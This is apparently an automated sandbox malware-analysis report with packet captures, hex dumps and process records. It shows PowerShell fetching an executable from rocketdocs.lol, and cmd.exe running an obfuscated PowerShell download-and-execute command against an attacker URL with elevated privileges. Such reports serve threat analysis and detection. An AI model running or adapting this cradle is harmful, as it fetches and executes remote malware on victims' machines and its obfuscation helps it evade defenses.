WUSH(LD$HHT$`HHHAhHD$PHHD$@LHAHD$8HAXHD$XHA`HD$hHHHH1E1HICL5IcL1HHT$@HVHT$pHHHHH;H{H{0cH1CLCPC`H$HHHGHHHH1E1H
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 4c 01 f0 31 f6 ff e0 4c 8d 74 24 70 b9 0a 00 00 00 4c 89 f7 4c 8b 7c 24 38 4c 89 fe f3 48 a5 48 be 00 00 00 00 00 00 00 80 48 89 73 08 48 89 73 20 48 89 73 38 83 63 50 00 c6 43 54 00 48 89 d9 e8 d2 ee ff ff 48 83 c6 04 48 89 33 b9 0a 00 00 00 4c 89 ff 4c 89 f6 f3 48 a5 be 01 00 00 00 e8 55 9d 00 00 e9 27 fd ff ff 4c 8b 64 24 78 e9 25 fd ff ff 4c 8d 05 b6 95 0b 00 4c 89 e1 48 8b 54 24 48 e8 69 a5 09 00 cc 41 56 56 57 53 48 83 ec 48 4c 89 c7 48 89 d3 48 89 ce 48 8b 41 20 48 3b 41 28 75 19 48 39 7e 18 77 13 48 89 f1 48 89 da 49 89 f8 e8 0b e9 ff ff 48 89 c2 eb 49 4c 8d 74 24 38 4c 89 f1 48 89 f2 e8 4c 00 00 00 49 8b 06 49 8b 56 08 48 85 c0 74 39 48 8d 4c 24 28 48 89 01 48 89 51 08 48 89 da 49 89 f8 e8 d3 e8 ff ff 48 89 c2 48 03 46 20 48 8b 4e 28 48 39 c8 48 Data Ascii: L1Lt$pLL\|$8LHHHsHs Hs8cPCTHHH3LLHU'Ld$x%LLHT$HiAVVWSHHLHHHA H;A(uH9~wHHIHILt$8LHLIIVHt9HL$(HHQHIHHF HN(H9H
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 89 d7 f3 48 a5 48 8d b4 24 b0 02 00 00 48 89 f1 e8 f2 97 00 00 4c 8b 3e 48 8d b4 24 b8 02 00 00 48 8d bc 24 08 03 00 00 b9 09 00 00 00 f3 48 a5 49 8d 5c 24 01 31 ed eb 08 49 8d 5c 24 03 40 b5 01 48 8d b4 24 e0 02 00 00 48 89 f1 31 d2 e8 43 9b 00 00 0f 10 84 24 90 01 00 00 0f 10 8c 24 a0 01 00 00 0f 10 94 24 b0 01 00 00 0f 29 56 f0 0f 29 4e e0 0f 29 46 d0 48 8d 4c 24 38 e8 47 92 00 00 48 8d 7c 24 50 48 8d b4 24 b0 02 00 00 b9 09 00 00 00 f3 48 a5 40 84 ed 74 0d 48 8d 8c 24 e8 00 00 00 e8 f3 e8 ff ff 48 8d bc 24 d0 01 00 00 48 89 5f f0 4c 89 7f f8 48 8d b4 24 08 03 00 00 b9 0b 00 00 00 f3 48 a5 48 8d 84 24 28 02 00 00 48 8d 54 24 38 b9 0c 00 00 00 48 89 c7 48 89 d6 f3 48 a5 c6 40 60 00 48 83 22 00 48 c7 42 08 01 00 00 00 48 83 62 10 00 48 8d 8c 24 c0 01 00 Data Ascii: HH$HL>H$H$HI\$1I\$@H$H1C$$$)V)N)FHL$8GH\|$PH$H@tH$H$H_LH$HH$(HT$8HHH@`H"HBHbH$
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: e6 df d9 48 89 10 48 8d b4 24 c0 01 00 00 48 8b 16 e8 5d ef ff ff 48 83 26 00 41 b1 01 31 c9 48 8d 15 d8 8f 0b 00 49 b8 00 38 f3 1e 62 40 d1 44 41 f6 c1 01 74 1e 44 0f b6 0c 11 4d 09 c1 4c 33 0c 08 4c 89 8c 0c c0 01 00 00 b9 08 00 00 00 45 31 c9 eb dc 0f b7 40 08 35 8c f7 00 00 48 8d b4 24 c0 01 00 00 48 8b 0e 48 8d 94 24 e8 00 00 00 48 89 0a 66 89 42 08 41 b8 0a 00 00 00 48 89 f1 e8 d9 77 05 00 48 8b 94 24 b8 02 00 00 4c 8b 84 24 c0 02 00 00 48 89 f1 e8 e1 78 05 00 c7 86 c4 00 00 00 00 00 00 08 48 8d 7c 24 38 48 89 f9 48 89 f2 e8 d7 89 04 00 4c 8d 05 50 8f 0b 00 48 8d 9c 24 08 03 00 00 48 89 d9 48 89 fa e8 c1 e4 ff ff 48 89 f1 e8 d6 df ff ff 83 7b 30 00 0f 85 f4 01 00 00 48 8d 05 05 18 18 00 48 8d 94 24 c0 01 00 00 48 89 02 48 8b 0a 48 b8 e2 17 cd bc 5b Data Ascii: HH$H]H&A1HI8b@DAtDML3LE1@5H$HH$HfBAHwH$L$HxH\|$8HHLPH$HHH{0HH$HHH[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49707	188.114.97.3	443	5560	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:52:14 UTC	76	OUT	GET /utox_x86.exe HTTP/1.1 Host: rocketdocs.lol Connection: Keep-Alive
2024-10-08 18:52:14 UTC	679	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:52:14 GMT Content-Type: application/x-msdownload Content-Length: 4971787 Connection: close last-modified: Sun, 29 Sep 2024 18:17:10 GMT x-turbo-charged-by: LiteSpeed Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 62 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMxUMqNc46pb8nezJUM5hYmgyEZdnSeabZPQHBi%2BA6aESzpe4jo33EAwDh5g3QAT%2BwPtvGgRp29rYZNTnfUo9L1gGrCXs%2F1FgcbOjEWJSlKJL2D4aKLo%2FhDC192MUe4Ebg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf853b01d6c5e70-EWR
2024-10-08 18:52:14 UTC	690	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 15 00 20 5f 0d 60 00 0e 41 00 66 5e 00 00 f0 00 26 00 0b 02 02 22 00 d0 29 00 00 36 34 00 00 f6 15 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 57 00 00 06 00 00 3b 75 4c 00 02 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd _`Af^&")64@W;uL
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 00 00 00 26 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e0 33 00 00 00 70 49 00 00 34 00 00 00 3a 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 80 00 00 00 00 b0 49 00 00 02 00 00 00 6e 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 49 00 00 02 00 00 00 70 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 88 b0 00 00 00 d0 49 00 88 b0 00 00 00 72 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 ac 16 00 00 00 90 4a 00 00 18 00 00 00 24 34 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 50 11 00 00 00 b0 4a 00 00 12 00 00 00 3c 34 00 00 00 00 00 00 00 00 00 00 Data Ascii: &3@0@.idata3pI4:3@0.CRTIn3@@.tlsIp3@@.rsrcIr3@0.relocJ$4@0B/4PJ<4
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 71 02 00 00 c7 05 ef 3d 33 00 01 00 00 00 8b 06 83 f8 01 0f 84 18 02 00 00 85 ed 0f 84 31 02 00 00 48 8b 05 4d 67 30 00 48 8b 00 48 85 c0 74 0c 45 31 c0 ba 02 00 00 00 31 c9 ff d0 e8 f4 00 29 00 48 8d 0d 9d 06 29 00 ff 15 8f 6d 49 00 48 8b 15 a0 67 30 00 48 89 02 e8 98 05 29 00 48 8d 0d 91 fd ff ff e8 dc be 29 00 e8 b7 fe 28 00 48 8b 05 20 67 30 00 48 89 05 d9 2f 48 00 e8 e4 be 29 00 48 8b 00 31 c9 48 85 c0 75 1c eb 5f 0f 1f 84 00 00 00 00 00 84 d2 74 2c 83 e1 01 74 27 b9 01 00 00 00 48 83 c0 01 0f b6 10 80 fa 20 7e e6 41 89 c8 41 83 f0 01 80 fa 22 41 0f 44 c8 eb e4 66 0f 1f 44 00 00 84 d2 75 11 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 80 fa 20 7f 0b 48 83 c0 01 0f b6 10 84 d2 75 f0 48 89 05 71 2f 48 00 44 8b 07 45 85 c0 74 16 f6 44 24 5c 01 b8 0a 00 00 00 0f Data Ascii: q=31HMg0HHtE11)H)mIHg0H)H)(H g0H/H)H1Hu_t,t'H ~AA"ADfDuf. HuHq/HDEtD$\
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 00 e8 f1 84 00 00 eb 72 c7 44 24 20 01 00 00 00 4c 8d 4b 12 4c 8d 43 10 48 89 c1 e8 2d c8 03 00 48 89 03 48 85 c0 74 4a 4c 8b 44 24 38 c6 43 14 01 48 8d 4b 15 4c 89 e2 4c 89 43 08 e8 eb b1 04 00 48 8b 05 a4 6c 30 00 48 3b 98 60 05 00 00 75 15 48 8b 54 24 38 4c 89 a0 68 05 00 00 48 89 90 70 05 00 00 eb 08 4c 89 e1 e8 a6 b1 29 00 b0 01 eb 0a 4c 89 e1 e8 9a b1 29 00 31 c0 48 83 c4 40 5b 5e 41 5c c3 41 56 41 55 41 54 57 53 48 83 c4 80 31 c0 41 b9 40 00 00 00 48 89 cb 48 8d 7c 24 42 b9 3e 00 00 00 49 89 d5 f3 aa 48 89 5c 24 20 4c 8d 64 24 32 4d 89 c6 4c 89 e1 4c 8d 05 da 57 2a 00 ba 4e 00 00 00 48 c7 44 24 32 00 00 00 00 48 c7 44 24 3a 00 00 00 00 e8 0e fd ff ff 4c 89 e1 41 b8 0a 00 00 00 31 d2 e8 5e 40 00 00 49 89 c4 48 85 c0 75 28 e8 f1 83 00 00 83 f8 02 7e Data Ascii: rD$ LKLCH-HHtJLD$8CHKLLCHl0H;`uHT$8LhHpL)L)1H@[^A\AVAUATWSH1A@HH\|$B>IH\$ Ld$2MLLW*NHD$2HD$:LA1^@IHu(~
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 00 00 00 4c 89 4c 24 58 4c 8d 4c 24 58 4c 89 4c 24 28 e8 cc 1e 29 00 48 83 c4 38 c3 41 54 48 81 ec 90 00 00 00 41 b9 40 00 00 00 49 89 c8 41 89 d4 48 8d 4c 24 47 ba 49 00 00 00 4c 89 44 24 20 4c 8d 05 cc 54 2a 00 48 89 4c 24 38 e8 a2 ff ff ff 45 84 e4 48 8b 4c 24 38 74 27 41 b8 0b 00 00 00 31 d2 e8 8b 3b 00 00 49 89 c4 48 85 c0 74 22 41 b8 02 00 00 00 31 d2 48 89 c1 e8 33 ac 29 00 eb 10 41 b8 01 00 00 00 31 d2 e8 64 3b 00 00 49 89 c4 4c 89 e0 48 81 c4 90 00 00 00 41 5c c3 41 56 41 55 41 54 53 48 83 ec 28 49 89 d5 ba 01 00 00 00 4d 89 c6 e8 62 ff ff ff 49 89 c4 48 85 c0 75 1e e8 cc 7e 00 00 ff c8 7e 5c 48 8d 15 4e 54 2a 00 48 8d 0d 4e 54 2a 00 e8 c0 7e 00 00 eb 47 45 31 c0 31 d2 48 89 c1 e8 f6 1b 29 00 41 b8 02 00 00 00 31 d2 4c 89 e1 e8 e6 1b 29 00 4c 89 Data Ascii: LL$XLL$XLL$()H8ATHA@IAHL$GILD$ LTHL$8EHL$8t'A1;IHt"A1H3)A1d;ILHA\AVAUATSH(IMbIHu~~\HNTHNT*~GE11H)A1L)L
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: ff 44 24 40 48 89 44 24 50 e8 7c 17 29 00 4c 89 e1 e8 c4 18 29 00 4c 8b 7c 24 50 48 89 c6 e9 5b fe ff ff 4c 89 e1 e8 97 a7 29 00 48 85 ff 74 08 48 8b 44 24 40 48 89 07 4c 89 e8 48 81 c4 98 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 41 56 41 55 41 54 53 48 83 ec 28 48 89 d3 ba 01 00 00 00 4d 89 c5 4d 89 ce e8 56 fa ff ff 49 89 c4 48 85 c0 75 1e e8 c0 79 00 00 ff c8 7e 72 48 8d 15 b5 51 2a 00 48 8d 0d b8 51 2a 00 e8 b4 79 00 00 eb 5d 45 31 c0 48 89 da 48 89 c1 e8 e9 16 29 00 85 c0 74 2c e8 90 79 00 00 ff c8 7e 16 49 89 d8 48 8d 15 4a 4f 2a 00 48 8d 0d ab 51 2a 00 e8 81 79 00 00 4c 89 e1 45 31 e4 e8 f3 a6 29 00 eb 1f 4d 89 e1 41 b8 01 00 00 00 4c 89 f2 4c 89 e9 e8 5d a6 29 00 4c 89 e1 41 b4 01 e8 d2 a6 29 00 44 89 e0 48 83 c4 28 5b 41 5c 41 5d 41 5e c3 Data Ascii: D$@HD$P\|)L)L\|$PH[L)HtHD$@HLH[^_]A\A]A^A_AVAUATSH(HMMVIHuy~rHQHQy]E1HH)t,y~IHJOHQyLE1)MALL])LA)DH([A\A]A^
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 85 d2 75 05 45 31 c0 31 d2 4c 89 e1 e8 6b 56 00 00 4c 89 e1 e8 22 55 00 00 b0 01 48 83 c4 20 41 5c c3 41 54 53 48 83 ec 28 45 31 e4 48 89 cb 48 89 d1 e8 b7 5b 00 00 48 85 c0 74 22 44 8a a0 a9 00 00 00 45 84 e4 74 16 0f b7 53 02 44 0f b6 40 60 45 31 c9 b9 25 00 00 00 e8 5e e6 00 00 44 89 e0 48 83 c4 28 5b 41 5c c3 41 54 57 56 53 48 83 ec 28 4d 63 e0 48 89 cb 44 89 44 24 60 48 89 d6 4c 89 e1 e8 29 a1 29 00 49 89 c1 48 85 c0 74 20 48 89 c7 4c 89 e1 0f b7 53 02 44 8b 44 24 60 f3 a4 b9 26 00 00 00 41 b4 01 e8 0e e6 00 00 eb 1f e8 2c 74 00 00 45 31 e4 ff c8 7e 13 48 8d 15 d2 4d 2a 00 48 8d 0d a9 4d 2a 00 e8 1d 74 00 00 44 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 90 90 90 90 90 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 45 31 e4 83 bc 24 a0 00 00 00 00 89 d3 4d Data Ascii: uE11LkVL"UH A\ATSH(E1HH[Ht"DEtSD@`E1%^DH([A\ATWVSH(McHDD$`HL))IHt HLSDD$`&A,tE1~HMHMtDH([^_A\AWAVAUATUWVSH8E1$M
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 06 7e 39 eb 32 e8 7e 6f 00 00 48 8d 15 97 49 2a 00 48 8d 0d af 4a 2a 00 83 f8 06 7e 1f eb 18 e8 64 6f 00 00 83 f8 06 7e 13 48 8d 15 78 49 2a 00 48 8d 0d b4 4a 2a 00 e8 57 6f 00 00 ba 98 04 00 00 b9 01 00 00 00 e8 e5 9c 29 00 49 89 c1 48 85 c0 75 23 e8 30 6f 00 00 ff c8 7e 3f 48 8d 15 45 49 2a 00 48 8d 0d a2 4a 2a 00 48 83 c4 20 5b 5e 5f e9 1d 6f 00 00 48 89 c7 48 89 de b9 26 01 00 00 0f b7 53 30 f3 a5 45 31 c0 b9 0e 00 00 00 48 83 c4 20 5b 5e 5f e9 d0 aa 03 00 48 83 c4 20 5b 5e 5f c3 41 55 41 54 57 53 48 83 ec 28 41 89 cc 41 89 d5 e8 d0 6e 00 00 83 f8 04 7e 19 45 89 e9 45 89 e0 48 8d 15 de 48 2a 00 48 8d 0d 97 4a 2a 00 e8 bd 6e 00 00 44 89 ea 44 89 e1 e8 64 fd ff ff 48 89 c3 48 85 c0 75 2a e8 9a 6e 00 00 ff c8 0f 8e 94 00 00 00 48 8d 15 ab 48 2a 00 48 8d Data Ascii: ~92~oHIHJ~do~HxIHJWo)IHu#0o~?HEIHJH [^_oHH&S0E1H [^_H [^_AUATWSH(AAn~EEHHHJnDDdHHunHHH
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: f3 a5 48 83 c9 ff 48 89 d7 48 c7 85 40 04 00 00 00 00 00 00 f2 ae 48 f7 d1 4c 8d 4c 0a ff 4c 8b ad 40 04 00 00 41 8a 51 ff 49 8d 49 ff 49 8d 45 01 80 fa 5c 74 11 80 fa 2f 74 0c 48 89 85 40 04 00 00 49 89 c9 eb d7 48 89 85 40 04 00 00 49 83 c5 02 b9 01 00 00 00 4c 89 ea 4c 89 4c 24 28 e8 73 97 29 00 4c 8b 4c 24 28 48 85 c0 48 89 85 38 04 00 00 48 89 c1 75 20 48 8d 0d ba 47 2a 00 4d 89 e8 48 8d 15 c6 43 2a 00 e8 ac 69 00 00 b9 02 00 00 00 e8 27 97 29 00 4c 8d 05 c8 47 2a 00 4c 89 ea e8 28 f8 ff ff 48 c7 85 58 04 00 00 00 00 00 00 48 c7 85 78 04 00 00 00 00 00 00 48 c7 85 88 04 00 00 00 00 00 00 44 89 e0 48 81 c4 d0 08 00 00 5e 5f 5d 41 5c 41 5d c3 41 54 48 81 ec 20 04 00 00 4c 8d 64 24 20 4c 89 e2 e8 ac fc ff ff 84 c0 74 4e e8 36 69 00 00 83 f8 04 7e 16 4d Data Ascii: HHH@HLLL@AQIIIE\t/tH@IH@ILLL$(s)LL$(HH8Hu HGMHCi')LG*L(HXHxHDH^_]A\A]ATH Ld$ LtN6i~M
2024-10-08 18:52:14 UTC	1369	IN	Data Raw: 0f 84 ef 00 00 00 83 ff 02 0f 84 1c 01 00 00 85 ff 0f 85 70 01 00 00 e8 ba 64 00 00 83 f8 06 7e 19 41 89 f1 41 89 d8 48 8d 15 c8 3e 2a 00 48 8d 0d b5 44 2a 00 e8 a7 64 00 00 41 8b 44 24 30 83 f8 03 74 1c 77 07 83 f8 02 74 41 eb 1e 83 e8 04 83 f8 01 77 16 41 c7 44 24 30 01 00 00 00 eb 2c 41 c7 44 24 30 02 00 00 00 eb 21 e8 66 64 00 00 ff c8 7e 18 45 8b 44 24 30 48 8d 15 76 3e 2a 00 48 8d 0d 8b 44 2a 00 e8 55 64 00 00 ba 98 04 00 00 b9 01 00 00 00 e8 e3 91 29 00 49 89 c1 48 85 c0 75 29 e8 2e 64 00 00 ff c8 0f 8e d7 00 00 00 48 8d 15 3f 3e 2a 00 48 8d 0d 9c 3f 2a 00 48 83 c4 28 5b 5e 5f 41 5c e9 15 64 00 00 48 89 c7 4c 89 e6 b9 26 01 00 00 45 31 c0 f3 a5 b9 0e 00 00 00 41 0f b7 54 24 30 48 83 c4 28 5b 5e 5f 41 5c e9 c4 9f 03 00 e8 dc 63 00 00 83 f8 06 7e 19 Data Ascii: pd~AAH>HDdAD$0twtAwAD$0,AD$0!fd~ED$0Hv>HDUd)IHu).dH?>H?H([^_A\dHL&E1AT$0H([^_A\c~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:52:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-08 18:52:22 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 06595dc4-f40a-4878-9acc-d4a786c5c71f MS-RequestId: 391c4b90-608a-4254-aa35-8cb60c175627 MS-CV: iQquCp0SZEuoxJSd.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 18:52:21 GMT Connection: close Content-Length: 24490
2024-10-08 18:52:22 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-08 18:52:22 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	55200	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:52:51 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-08 18:52:51 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: afa7f4f1-4645-4138-b87d-025bc8c8c10d MS-RequestId: 840eab9a-34c6-4f25-8e4e-a2dcac26483f MS-CV: K3EizEdKdkO9ntDV.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 18:52:51 GMT Connection: close Content-Length: 30005
2024-10-08 18:52:51 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-08 18:52:51 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	14:52:01
Start date:	08/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Imagebase:	0x7ff7a52d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:52:01
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:52:02
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
